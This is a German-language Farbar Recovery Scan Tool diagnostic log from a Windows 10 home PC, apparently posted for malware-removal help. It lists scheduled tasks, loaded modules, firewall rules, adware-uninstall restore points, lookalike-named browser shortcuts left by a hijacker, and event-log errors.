Task: {1A3181DF-833E-436D-A30C-248F034B8623} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {1EA42CBF-EADD-4B00-81ED-2C40E4238B7C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {3024B4B3-FD37-477F-BA7A-04E9D557A0DF} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {358E9F01-B54F-4F1A-A590-566825F4CCF6} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3782FA31-E821-4B7B-9FD3-1FC42377DBD5} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3A539CDD-D9FE-4485-BB5E-F119374C2E2B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {3B7398CA-6B98-47E4-BFFB-FB8AEB3C62F8} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {535076EF-9CD5-46BA-A7C8-10EEDDA703A2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {595ED7A0-ED76-4B70-9B39-AA80B04DC0D1} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {60FA74FF-6279-4ECD-9EA9-5DE73A58257E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {71C58D38-8A13-46DD-8D3E-D7EDF04F9F41} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {74E7882B-EC43-4B32-87E6-E11EFB4D4BAA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {82C50AED-8035-414F-9332-DE47AED14F1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {8621A79A-23F3-402E-B829-1B3C08FC23C6} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {917F73AC-B595-428F-9D7E-804DD4CA0B19} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Barbara\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {931E12E2-BA73-4859-AF12-777A31166AB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-01-20] (NVIDIA Corporation)
Task: {981171F7-EB47-47C7-9E26-7F1DE33B4C5E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {9AF8C6A8-27BD-459C-A0B6-149FCF640506} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-01-20] (NVIDIA Corporation)
Task: {A23D98E2-25C7-4A4E-A93A-5277AAE5D6BD} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {A9DC2516-E3BE-4B34-AE6A-49DECD192D48} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {ABD44F90-CD20-4C95-AA96-464B6AEE71FE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {AED5C637-95A0-4DD0-ADC7-A4808E2FACE9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {B3737810-7B5B-49FA-ABF7-D2566CB7161D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {B73E6B94-97F6-4185-B265-5AF584ADD7C2} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {B8A37631-3077-4955-BA7D-5E165F4C4DB5} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {C0F5AE71-6716-4F6C-ADC4-059DF01B35BA} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {C1B4B136-C33D-4401-AED3-81D2C9151669} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {CF59DDC9-64FA-4592-BA4C-996DE144E956} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {D15D9A6F-7B7C-46FF-B72E-989CE158ACF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {D20E72EA-E1B2-4FCA-90F2-94F73460A59C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {EF1F752D-CA59-470C-BB1B-D66C885E54E5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-23 02:40 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-23 02:40 - 2013-07-04 02:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2016-10-13 07:34 - 2017-01-20 19:39 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-23 03:38 - 2016-09-23 03:38 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 21:04 - 2016-12-21 08:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-10 20:59 - 2016-12-21 07:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 20:59 - 2016-12-21 07:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-08-26 19:25 - 2016-08-26 19:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2017-02-10 11:43 - 2017-02-10 11:44 - 13170368 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7903.40527.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-01-25 11:40 - 2017-01-25 11:40 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
2017-02-06 11:43 - 2017-02-06 11:44 - 00073728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-02-06 11:43 - 2017-02-06 11:44 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-02-06 11:43 - 2017-02-06 11:44 - 42895872 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-02-06 11:43 - 2017-02-06 11:44 - 02215424 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\roottools.dll
2016-09-23 02:40 - 2017-02-13 21:24 - 00028672 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2016-09-23 02:40 - 2013-07-04 02:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2016-10-22 12:18 - 2016-10-22 12:18 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-13 07:34 - 2017-01-20 19:38 - 64245184 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-13 07:34 - 2017-01-20 14:36 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-13 07:34 - 2017-01-20 14:36 - 02808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00537656 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00468024 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 01066552 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2017-02-03 17:12 - 2017-01-20 14:36 - 01014840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2017-02-12 22:14 - 00000833 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Steam"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [UDP Query User{89490B79-F7C4-449C-AEA9-7C67ECB9FB5B}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{4A234969-EDBC-4530-B847-6329B46AA77A}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{F111BCF2-9CBB-4742-9CFC-D23879181430}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{3DC38285-63C7-451A-AE42-5DB7E25FE3FB}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [{C681929D-CAC5-43C1-8926-0E72B114FE4B}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{51B20E6F-4269-4C1F-BCCF-4AE409514E34}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{1EFF0FAC-0E9E-4E91-809B-2BBDDEF8994B}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{51F45EC0-BB2A-4881-81A4-39592A9F1F50}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{592ABD94-223B-4029-ADAD-C4B4FCB9D173}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E1123DD8-DF30-4BAF-95D0-0CD324E434C5}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E755C63D-D036-4730-806E-F025F68F5F83}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EA936888-D98A-4A6D-8DD0-3AD3C9E0A3BE}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{B23562F6-99F7-40EB-85CA-F7BC0A871F26}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{B9E938BA-EF39-4E7E-85AB-3E80B71AFF38}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DC1A5F54-BD72-48BE-9E47-2743168046A0}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{552C0333-744D-467D-9BBA-8B77D85239E4}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{D8E7A1C6-22AF-42A9-8E8C-58F55E9CE22C}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{E0D9EE58-C0E4-48F0-BDC9-947A2AB5CA23}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4ED0602B-CF04-4814-BAC6-89B59E81BAAC}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015

==================== Wiederherstellungspunkte =========================

25-01-2017 13:43:30 Windows Update
03-02-2017 17:33:02 Geplanter Prüfpunkt
09-02-2017 13:37:47 Windows Update
13-02-2017 20:00:44 Revo Uninstaller's restore point - AppTrailers - AppTrailers for Desktop
13-02-2017 20:01:09 Revo Uninstaller's restore point - AppTrailers - AppTrailers for Desktop
13-02-2017 20:01:36 Revo Uninstaller's restore point - BeCleaner version 1.0
13-02-2017 20:01:57 Revo Uninstaller's restore point - HDWallPaper 1.0
13-02-2017 20:02:41 Revo Uninstaller's restore point - MyMemory
13-02-2017 20:03:19 Revo Uninstaller's restore point - MyMemory
13-02-2017 20:03:37 Revo Uninstaller's restore point - OtherSearch
13-02-2017 20:03:56 Revo Uninstaller's restore point - pccleanplus
13-02-2017 20:04:22 Revo Uninstaller's restore point - Search module
13-02-2017 20:04:57 Revo Uninstaller's restore point - Social2Search
13-02-2017 20:05:16 Revo Uninstaller's restore point - Social2Search
13-02-2017 20:06:10 Revo Uninstaller's restore point - youndoo - Uninstall
13-02-2017 20:06:27 Revo Uninstaller's restore point - trotux - Uninstall
13-02-2017 20:08:26 Revo Uninstaller's restore point - Malwarebytes Anti-Malware Version 2.2.1.1043
13-02-2017 20:09:06 Revo Uninstaller's restore point - youndoo - Uninstall
13-02-2017 20:09:29 Revo Uninstaller's restore point - BrowserAir
13-02-2017 20:11:04 Revo Uninstaller's restore point - Search module
13-02-2017 20:11:46 Revo Uninstaller's restore point - MyMemory

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/13/2017 08:45:22 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Barbara-PC)
Description: Bei der Aktivierung der App „Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (02/13/2017 08:38:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MicrosoftEdge.exe, Version: 11.0.14393.693, Zeitstempel: 0x585a26c4
Name des fehlerhaften Moduls: CoreUIComponents.dll, Version: 0.0.0.0, Zeitstempel: 0x584a72ab
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000072fda
ID des fehlerhaften Prozesses: 0x8c8
Startzeit der fehlerhaften Anwendung: 0x01d28628cb26d4e3
Pfad der fehlerhaften Anwendung: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\system32\CoreUIComponents.dll
Berichtskennung: a4960bf2-14ed-4555-a40e-1413ed284da4
Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: MicrosoftEdge

Error: (02/13/2017 08:13:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_WinSnare, Version: 10.0.14393.0, Zeitstempel: 0x57899b1c
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.14393.479, Zeitstempel: 0x5825887f
Ausnahmecode: 0xc0000008
Fehleroffset: 0x00000000000a9d2a
ID des fehlerhaften Prozesses: 0x1a50
Startzeit der fehlerhaften Anwendung: 0x01d2862d3d21a06a
Pfad der fehlerhaften Anwendung: C:\Windows\System32\svchost.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 0546e240-cebe-4c86-818c-9cec689d6235
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (02/13/2017 08:11:47 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:11:04 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:09:30 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:09:07 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:08:26 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:06:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 08:06:10 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Systemfehler:
=============
Error: (02/13/2017 09:24:53 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (02/13/2017 09:24:50 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.

Error: (02/13/2017 09:24:05 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler:
Es wird bereits eine Instanz des Dienstes ausgeführt.

Error: (02/13/2017 09:23:35 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/13/2017 09:23:35 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Net.Msmq-Listeneradapter" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/13/2017 09:23:35 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Net.Pipe-Listeneradapter" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/13/2017 09:23:34 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Origin Web Helper Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/13/2017 09:23:34 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA Telemetry Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/13/2017 09:23:34 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Message Queuing" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/13/2017 09:23:34 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
